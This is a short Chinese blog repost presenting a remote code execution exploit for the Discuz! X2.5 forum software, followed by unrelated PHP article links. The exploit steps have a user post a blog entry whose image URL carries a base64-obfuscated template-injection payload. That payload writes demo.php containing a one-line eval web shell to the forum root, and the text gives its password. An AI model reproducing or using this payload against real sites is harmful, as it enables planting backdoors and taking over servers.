Discuz! X2.5 远程代码执行漏洞及EXP

2023-06-27 02:24:48

利用方法：

1.注册任意账户

2.登陆用户，发表blog日志（注意是日志）

3.添加图片，选择网络图片，地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}

4.访问日志，论坛根目录下生成demo.php，一句发密码C

转载于:https://www.cnblogs.com/mujj/articles/2620907.html

php

上一篇: 【算法与数据结构】字符串模式匹配 KMP 算法语义暴力匹配 brute forceKMP

下一篇: 【封装】Apache的DbUtils使用一、Apache的DbUtils使用

继续阅读

第三章 Joomla!扩展开发--后端开发（续2）
php 后端 javascript
08-07
Centos 7 Apache配置虚拟主机
php Linux apache centos 服务器虚拟主机
08-07
PHP进阶学习之session写入数据库
php session application 数据库网络
08-07
php写一个简洁的登录页面
php
08-07
Apache与PHP环境下配置本地虚拟主机
php apache 虚拟主机
08-07
Testlink安装部署之XAMPP
Testlink php 数据库
08-07
TestLink 图表中文乱码问题
Testlink php
08-07
ecshop属性排序
php
08-07
Ubuntu16.04安装Apache+MySQL+PHP1. 安装Apache2. 安装MySQL3. 安装PHP4. 安装phpMyAdmin
php apache ubuntu mysql httpd
08-07
版本号隐藏
httpd nginx php tomcat
08-07
Apache配置SSLApache配置SSL
服务器 php apache openssl ssl
08-07
配置apache支持PHP（win7）
apache httpd-conf php
08-07
Cloud Studio初体验
Python ruby php
08-07
NOSQL安全攻击
php 数据库大数据
08-07
php 去掉字符串的最后一个字符及截取原字符串1,2,3,4,5,6,
php
08-07
php——水印
php 备忘水印
08-07